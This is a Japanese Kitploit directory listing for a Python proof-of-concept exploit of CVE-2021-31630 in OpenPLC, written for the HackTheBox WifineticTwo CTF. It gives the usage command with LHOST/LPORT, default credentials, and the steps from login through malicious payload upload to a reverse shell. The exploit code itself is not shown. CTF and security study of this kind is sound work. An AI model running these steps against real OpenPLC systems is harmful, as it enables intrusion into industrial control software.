Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
htb-wifinetictwo-exploit — HTB WifineticTwo CTF における CVE-2021-31630 を悪用する簡単な Python スクリプト | Kitploit
ツール/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用CTF学習と教育リモートアクセスツールバイナリエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

HTB WifineticTwo CTF における CVE-2021-31630 を悪用する簡単な Python スクリプト

リポジトリを見る
12年前未レビュー

CVE-2021-31630 エクスプロイトPoC

このPythonスクリプトは、CVE-2021-31630のProof of Concept (PoC)エクスプロイトです。HackTheBoxのWifineticTwoボックスで動作するOpenPLCの脆弱性を標的としています。教育目的のみで設計されており、管理された環境でのエクスプロイトプロセスを実証することを目的としています。

免責事項

このツールはセキュリティ研究および教育目的のみを意図しています。このツールを事前の相互同意なくターゲットを攻撃するために使用することは違法です。開発者は、このエクスプロイトを悪用したユーザーに対する損害や刑事告訴について一切の責任を負いません。

前提条件

このエクスプロイトを実行する前に、以下を確認してください:

  • システムにPython 3がインストールされていること。
  • requestsライブラリがインストールされていること。pip install requestsでインストールできます。

使用方法

このエクスプロイトを使用するには、ターゲットのURL、リバースシェルが接続するローカルホストIP(LHOST)、およびローカルポート(LPORT)を指定する必要があります。オプションで、デフォルトと異なる場合、OpenPLCのユーザー名とパスワードを指定できます。

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

引数

  • --target - ターゲットのベースアドレス。例:http://wifinetictwo.htb:8080
  • --lhost - リバースシェルが接続するローカルホストIPアドレス。
  • --lport - リバースシェルが接続するローカルポート。
  • --usr - (オプション) OpenPLCのユーザー名。デフォルトはopenplc。
  • --pwd - (オプション) OpenPLCのパスワード。デフォルトはopenplc。

機能

  • 提供された認証情報を使用してログインプロセスを自動処理します。
  • リモートコード実行を実現するために悪意のあるペイロードを作成してアップロードします。
  • 攻撃者の指定したIPとポートへのリバースシェルを開始します。

エクスプロイトプロセス

  1. ログイン: スクリプトは提供された認証情報を使用してOpenPLCアプリケーションにログインします。
  2. ペイロード作成: リバースシェルを開始するように設計された悪意のあるペイロードを動的に作成します。
  3. ペイロードアップロード: 作成したペイロードをサーバーにアップロードします。
  4. エクスプロイトトリガー: アップロードされた悪意のあるコードのコンパイルを試みてエクスプロイトをトリガーし、リバースシェルを生成します。

謝辞

  • CVE-2021-31630を発見・報告したFellipe Oliveiraに特に感謝します。
  • サイバーセキュリティの練習と学習のための現実的な環境を提供してくれたHackTheBoxに感謝します。
ツールをダウンロード